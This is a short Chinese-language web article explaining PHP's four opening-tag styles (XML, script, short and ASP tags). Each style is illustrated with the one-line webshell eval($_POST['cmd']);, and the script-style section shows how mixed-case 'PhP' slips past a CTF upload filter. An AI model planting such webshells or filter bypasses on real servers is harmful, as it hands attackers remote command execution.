溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

php的標(biāo)識有哪些?

發(fā)布時間:2020-05-13 09:13:43 來源:億速云 閱讀:234 作者:Leah 欄目:編程語言

PHP的標(biāo)識有哪些?這個問題可能是我們?nèi)粘9ぷ鹘?jīng)遇見到的。通過這個問題,希望你能收獲更多。如果你不看答案,不知道是否有把握回答這個問題?讓我們來試試。

PHP四種標(biāo)記風(fēng)格

1.XML風(fēng)格

<?php
eval($_POST['cmd']); 
 ?>

php推薦使用的標(biāo)記風(fēng)格。

服務(wù)器管理員無法禁用,所有服務(wù)器上均可使用該風(fēng)格。

2.腳本風(fēng)格

<script language="php">
    eval($_POST['cmd']);
</script>

默認(rèn)開啟,無法禁用

筆者曾遇到過一CTF題目,要求上傳shell,但是卻對文件內(nèi)容做了過濾 ,<? 以及 php,替換為了空格。此種風(fēng)格中,language的值,大小寫都可以,因此可以構(gòu)造如下代碼進(jìn)行繞過

<script language="PhP">
    eval($_POST['cmd']);
</script>

3.簡短風(fēng)格

<? 
    eval($_POST['cmd']);
?>

此種風(fēng)格需要在配置文件php.ini中啟用short_open_tage選項(xiàng)

此種風(fēng)格在許多環(huán)境中默認(rèn)是不支持的

4.ASP風(fēng)格

<% 
    eval($_POST['cmd']);
%>

此種風(fēng)格需要在配置文件php.ini中啟用asp_tag選項(xiàng)

在默認(rèn)情況下是禁用的

看完上述內(nèi)容,你們對php的標(biāo)識大概了解了嗎?如果想了解更多相關(guān)文章內(nèi)容,歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI